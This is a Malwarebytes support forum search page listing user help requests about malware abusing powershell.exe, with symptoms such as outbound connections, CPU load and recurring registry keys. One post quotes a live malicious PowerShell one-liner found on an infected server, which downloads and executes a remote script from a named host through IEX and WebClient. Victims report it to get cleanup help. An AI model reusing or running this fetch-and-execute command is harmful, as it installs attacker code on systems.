Jump to content

Search the Community

Showing results for tags 'powershell.exe'.

  • Search By Tags

    Type tags separated by commas.
  • Search By Author

Content Type


  • Announcements
    • Malwarebytes News
    • Beta Testing Program
  • Malware Removal Help
    • Windows Malware Removal Help & Support
    • Mac Malware Removal Help & Support
    • Mobile Malware Removal Help & Support
    • Malware Removal Self-Help Guides
  • Malwarebytes for Home Support
    • Malwarebytes for Windows Support Forum
    • Malwarebytes for Mac Support Forum
    • Malwarebytes for Android Support Forum
    • Malwarebytes for iOS Support
    • Malwarebytes Privacy
    • Malwarebytes Browser Guard
    • False Positives
    • Comments and Suggestions
  • Malwarebytes for Business Support
    • Malwarebytes Nebula
    • Malwarebytes Nebula Modules
    • Malwarebytes Endpoint Security
    • Other Malwarebytes Business Products
    • Malwarebytes Business Products Comments and Suggestions
  • Malwarebytes Tools and Other Products
    • Malwarebytes AdwCleaner
    • Malwarebytes Junkware Removal Tool Support
    • Malwarebytes Anti-Rootkit BETA Support
    • Malwarebytes Techbench USB (Legacy)
    • Malwarebytes Secure Backup discontinued
    • Other Tools
    • Malwarebytes Tools Comments and Suggestions
  • General Computer Help and Security Updates
    • BSOD, Crashes, Kernel Debugging
    • General Windows PC Help
  • Research Center
    • Newest Rogue-Ransomware Threats
    • Newest Malware Threats
    • Newest Mobile Threats
    • Newest IP or URL Threats
    • Newest Mac Threats
    • Report Scam Phone Numbers
  • General
    • General Chat
    • Forums Announcements & Feedback

Find results in...

Find results that contain...

Date Created

  • Start


Last Updated

  • Start


Filter by number of...


  • Start





Website URL






Found 18 results

  1. Any help would be appreciated. Malwarebytes is saying powershell.exe is the source of these occurrences. Attached are Addition and FRST txt from FRST scan. Thanks! Addition.txt FRST.txt
  2. Hi, I'm a victim of the powershell.exe outbound to wmail-chat.com/wmail-endpoint.com domain. What to do. Please help. Thanks in advance. Dinesh
  3. Hey! I like others came here with a problem, I got a ...virus? So yesterday I scanned my laptop with Malwarebytes and quarantined all the malwares. But today I keep getting notifications said that: RTP detection, the software was powershell.exe and it was a trojan virus. I had already run a scan with Farbar Recovery Scan Tool, hope you guys can help me out. Sorry for my bad English. FRST.txt Addition.txt
  4. Hi there, I have a few problems with my PC since last time. The major problem is low wifi speed and impossible to open internet settings from windows bar (i have windows 10 64-bit). When im trying to open it command window shows up then immediately close. In add i have some information in windows defender that powershell.exe trojan is installed and action is needed. In add i have problem with my spacebar which doesn't work properly. Please help me with this. i have tried malware scan allready without success. Addition.txt FRST.txt malware scan.txt
  5. Dear Team, Recently few days back i had found the new malware in our work group computers. It is named powershell.exe, we can find it in task manager in processes tab. It utilizing more CPU it causes impact to all other applications running in the CPU. I had tried malwarebytes and some other antivirus tools but those are not detecting this bug. Please help us solve the issue. Malware programmers create files with virus codes and named it powershell.exe to spread malware on the internet. we need serious attention here to block and remove it in the network. Please help us to do it. Regards John.
  6. Hello, i have problem with powershell.exe it slow down my pc, but i dont know what to do to delete him, can anybody help me please? I saw few topics and i installed frst64 in attach are logs. Thank you. Addition.txt FRST.txt
  7. Hi, Recently we are seeing so many powershell.exe processes on the server box (running WebServer) , it chokes the server , sometimes we are just unable to even RDP the box. On the malwareBytes end , it pops up warning/alert regarding outgoing connection on xxxxx port by process powershell.exe Can you please suggest me a way to handle this. Thanks Sourabh
  8. Hi, I have to Windows servers (2008 and SBS2011) and both were infected with Y1.bat variant, I run some scripts and apparently I remove them from the system, actually I have Malwarebytes EndPoint installed and from time to time the anti-exploit shows a message blocking some IP address from access, but none people use this server as a workstation. Now apparently the malware comes again but with a differente variant and when I scan with Malwarebytes no infection appears, I download and Scan with the Anti-Rootkit and nothing appear. I see that the %temp% folders is redirected to a Temp\1 folder (same as the last time), not sure how to properly remove this thread. Any suggestion will be appreciated. Before I discover the following script that I properly remove: powershell -nop "$a=([string](Get-WMIObject -Namespace root\Subscription -Class __FilterToConsumerBinding ));if(($a -eq $null) -or (!($a.contains('SCM Event Filter')))) {IEX(New-Object Net.WebClient).DownloadString('http://stafftest.spdns.eu:8000/mate6.ps1')}" The following link explain how to remove it in the past: https://community.spiceworks.com/topic/2080003-malicious-powershell-script-causing-100-cpu-load-solved
  9. Hello i have an issue with Powershell.exe ruinning on my computer its a brand new system it uses up tp 35% cpu and it appears and dissapers every 3 minutes , i dont know if its an infection or whatever that is but i can tell it reduces perfomance of my laptop in cpu intensive tasks. Looking for some help. I will include Farbar report Addition.txt FRST.txt
  10. I have the same problem. Guidance would be appprciated. If I need to start a parallel thread, please let me know. 062317 log.txt
  11. I'm having the same issue. Only created a forum account to try and resolve it.
  12. I had a lapse in judgment a couple weeks ago and allowed something to be installed on my PC that I shouldn't have. I thought I cleaned everything up, but I'm still having a small issue with powershell.exe. It will randomly (or it's scheduled, I'm not sure) pop up and cause the 3 issues in the picture below. Based on other users with similar issues, I've attached reports from Farbar. Any help would be greatly appreciated. Thank you. Addition.txt FRST.txt
  13. Can't seem to get rid of these 2 reported pups Downloaded and run Farbar as this seems to be your favoured tool - reports attached Please help Addition.txt FRST.txt
  14. Having the same issue. These registry changes relating to PUP.Optional.PSScriptLoad.EncJob keep coming back. I have occasionally (ie, when I happen to be watching) seen a window appear briefly on screen at about 16:30h local time (Adelaide Australia) and following this if I run a MB v3.1.2.1733 scan, the 5 PUPs (registry keys and values) are found. I quarantine them, restart and MB no longer finds the PUPs. Neither are they found next morning. They appear again after 1630h aprox. So every evening I have to scan quarantine and re-boot. AdwCleaner initially found 2 items which I removed - it no longer finds anything It would be nice to permanently get rid of these annoyances Cheers
  15. Iv got this really annoying problem with powershell.exe, sometimes i cant even access any internet domain and it doesnt let me update the antivirus (ESET). The powershell.exe starts up with windows and nothing that i did could prevent it from doing so, iv scanned this pc with Malwarebytes, RougueKiller, ZHPCleaner, ADWcleaner, Spyware and Farbar, but none of those found anything, besides rouguekiller, but the files it deleted came back as soon as the pc restarted. Im trully lost in this one, pls help Here are the logs from the scans iv ran Addition.txt FRST.txt JRT.txt mrt.log Roguekiller log.txt ZHPCleaner.txt
  16. log of the following keys and register values are continually detected and removed by anti- malware , but these keys / registry values are the result ,of the virus on the registary not removing the keys results in powershell opening a window and running a script , which i cant see before its gone from screen after the script has run i found that it corrupted display driver , and forced a Blue screen of death when ever the pc returned from sleep / hibernation mode I am yet to find the true script command being run or whats keeps placing the keys and thus running the powershell script back on the registry , it would be nice to solve log of the keys that are detected and removed attached Regards shawn malware virus log dump 22_6_17.txt
Back to top
  • Create New...

Important Information

This site uses cookies - We have placed cookies on your device to help make this website better. You can adjust your cookie settings, otherwise we'll assume you're okay to continue.